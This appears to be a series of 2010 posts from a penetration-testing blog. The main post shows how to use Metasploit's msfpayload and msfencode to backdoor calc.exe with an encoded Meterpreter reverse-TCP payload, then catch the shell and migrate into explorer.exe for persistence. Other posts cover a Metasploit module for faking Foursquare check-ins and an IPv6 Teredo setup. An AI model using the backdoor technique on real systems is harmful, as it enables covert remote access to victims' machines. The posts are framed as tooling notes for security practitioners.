carnal0wnage [Shared Reader]

Wednesday, March 24, 2010

Msfencode a Msfpayload Into An Existing Executable

Very cool update to metasploit today:

This update allows you to msfencode a msfpayload into an existing executable and the new executable still function like the original. So if you inject into calc.exe you get calc.exe and your backdoor.

let's see the new msfencode options:

~/trunk$ ./msfencode -h

Usage: ./msfencode


-a The architecture to encode as

-b The list of characters to avoid: '\x00\xff'

-c The number of times to encode the data

-e The encoder to use

-h Help banner

-i Encode the contents of the supplied file path

-k Keep template working; run payload in new thread (use with -x)

-l List available encoders

-m Specifies an additional module search path

-n Dump encoder information

-o The output file

-p The platform to encode for

-s The maximum size of the encoded data

-t The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war)

-x Specify an alternate win32 executable template

Let's make our new backdoored executable.

~/trunk$ ./msfpayload windows/meterpreter/reverse_tcp LHOST= R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)

Get the backdoored exe on the other box and execute it. We have a functional calc.exe and our shell.

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST


msf exploit(handler) > exploit

[*] Started reverse handler on

[*] Starting the payload handler...

[*] Sending stage (748032 bytes)

[*] Meterpreter session 3 opened ( ->

Keep in mind that you'll still need to migrate away from the backdoored executable process because if they close the exe you lose your shell.

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > run migrate explorer.exe

[*] Current server process: calc_backdoor.exe (3360)

[*] Migrating to explorer.exe...

[*] Migrating into process ID 1592

[*] New server process: Explorer.EXE (1592)

meterpreter > getuid

Server username: WINXPSP3\user

meterpreter > getpid

Current pid: 1592

meterpreter >

Saturday, March 20, 2010

Working on a new tool

To the readers of this blog,

This blog has been inactive for about a month but it has nothing to do w/ a standstill on my part. I will post something useful relatively soon but please know I am co-authoring another AppSec specific tool and this takes up the majority of my time.

Hopefully when the software (open source) is released it won't disapoint :-)



Friday, March 19, 2010

F**king With Foursquare Goes MSF Style

mindless foursquare fun goes metasploit style...

msf > use auxiliary/admin/foursquare
msf auxiliary(foursquare) > info

Name: Foursquare Location Poster

Version: $Revision:$

License: Metasploit Framework License (BSD)

Rank: Normal

Provided by:


Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD password yes foursquare password

Proxies no Use a proxy chain

RHOST yes The target address

RPORT 80 yes The target port

USERNAME username yes foursquare username

VENUEID 185675 yes foursquare venueid

VHOST no HTTP server virtual host


Fuck with Foursquare, be anywhere you want to be by venue id


msf auxiliary(foursquare) >
msf auxiliary(foursquare) > set USERNAME

msf auxiliary(foursquare) > set PASSWORD notmypassword

msf auxiliary(foursquare) > set VENUEID 9186

VENUEID => 9186

msf auxiliary(foursquare) > run

[*] HTTP/1.1 200 OK

Content-Type: text/xml; charset=utf-8

Date: Fri, 19 Mar 2010 13:59:28 GMT

Content-Length: 1311

Server: nginx/0.7.64

Connection: keep-alive

Fri, 19 Mar 10 13:59:28 +0000OK! We've got you @ Washington Monument. This is your 1st checkin here!9186Washington Monument79199Parks & Outdoors:Sculpture SNIP

[*] Auxiliary module execution completed

You can get the module here:

Thursday, March 18, 2010

Getting Started With IPv6

Getting IPv6 up and running

Install the miredo package:
$ sudo apt-get install miredo

After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.

Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove


$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}

If miredo is running you should have another interface called "teredo".
You can display it with the following command:

$ ifconfig teredo

To test if you can reach the IPv6 network, try the following:
carnal0wnage ~: ping6 PING 56 data bytes 64 bytes from icmp_seq=1 ttl=55 time=284 ms 64 bytes from icmp_seq=4 ttl=55 time=100 ms 64 bytes from icmp_seq=5 ttl=55 time=108 ms --- ping statistics --- 7 packets transmitted, 3 received, 57% packet loss, time 6000ms rtt min/avg/max/mdev = 100.005/164.009/284.016/84.920 m

carnal0wnage ~: ping6 PING 56 data bytes 64 bytes from icmp_seq=1 ttl=58 time=472 ms 64 bytes from icmp_seq=2 ttl=58 time=156 ms 64 bytes from icmp_seq=3 ttl=58 time=156 ms 64 bytes from icmp_seq=5 ttl=58 time=156 ms 64 bytes from icmp_seq=6 ttl=58 time=156 ms --- ping statistics --- 7 packets transmitted, 5 received, 28% packet loss, time 6000ms rtt min/avg/max/mdev = 156.009/219.212/472.027/126.408 ms

carnal0wnage ~: traceroute6 traceroute to (2001:6b0:1:ea:202:a5ff:fecd:13a6), 30 hops max, 40 byte packets 1 * * * 2 (2a02:9a0:0:1::193) 612.035 ms 612.035 ms 612.035 ms 3 (2001:6b0:dead:beef:2::3a9) 648.037 ms 648.037 ms 648.037 ms 4 (2001:6b0:dead:beef:2::2c6) 636.036 ms 636.036 ms 636.036 ms 5 2001:6b0:1:1d20::2 (2001:6b0:1:1d20::2) 736.042 ms 736.042 ms * 6 * 2001:6b0:1:1200::3 (2001:6b0:1:1200::3) 324.018 ms 324.018 ms 7 (2001:6b0:1:ea:202:a5ff:fecd:13a6) 160.009 ms 156.009 ms 156.009 ms

Changing teredo server:

sudo vi /etc/miredo.conf ServerAddress sudo /etc/init.d/miredo restart

Windows XP

Open the Terminal with Start -> Run -> cmd

netsh interface ipv6 install netsh interface ipv6 set teredo client


netsh interface ipv6 uninstall


IPV6 and Teredo is enabled per default. You can get into the settings by going into the preferences for an network interface. "Obtain an IPv6 address automatically" should do the trick.

Add this registry value ("DWORD") set to 0xFF (long line, double-click, and copy):


Or save the two lines in a .reg file and double-click it:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters] "DisabledComponents"=dword:000000ff

You can also go to the interface properties of an network interface and deselect the IPv6 protocol for that interface. To enable IPv6 again, replace dword:000000ff above with dword:00000000.


Monday, March 15, 2010

F**king with Foursquare

Foursquare is pretty neat. You can post you location via phone or browser and get nifty badges for different things or become a mayor of a place if you check in to that location the most. Its also exceedingly easy to cheat at.

I only casually mentioned the idea of cheating to @Jack_Mannino and within a few minutes of emailing him the link to the API he was already traveling the globe at record speed.

Foursquare even has a nifty and pretty easy to understand API here:

The simplest thing you can do is checkin and post your location by vid or venue.

Formats: XML, JSON
HTTP Method(s): POST
Requires Authentication: Yes

  • vid - (optional, not necessary if you are 'shouting' or have a venue name). ID of the venue where you want to check-in
  • venue - (optional, not necessary if you are 'shouting' or have a vid) if you don't have a venue ID or would rather prefer a 'venueless' checkin, pass the venue name as a string using this parameter. it will become an 'orphan' (no address or venueid but with geolat, geolong)
  • shout - (optional) a message about your check-in. the maximum length of this field is 140 characters
  • private - (optional). "1" means "don't show your friends". "0" means "show everyone"
  • twitter - (optional, defaults to the user's setting). "1" means "send to Twitter". "0" means "don't send to Twitter"
  • facebook - (optional, defaults to the user's setting). "1" means "send to Facebook". "0" means "don't send to Facebook"
  • geolat - (optional, but recommended)
  • geolong - (optional, but recommended)

So a sample request would look like:

POST /v1/checkin?vid= HTTP/1.1
Authorization: Basic
Proxy-Connection: Keep-Alive



It being a POST you'll have to write some code to handle the Content-Length or use Burp Repeater or Metasploit.

Have fun traveling the globe from your living room.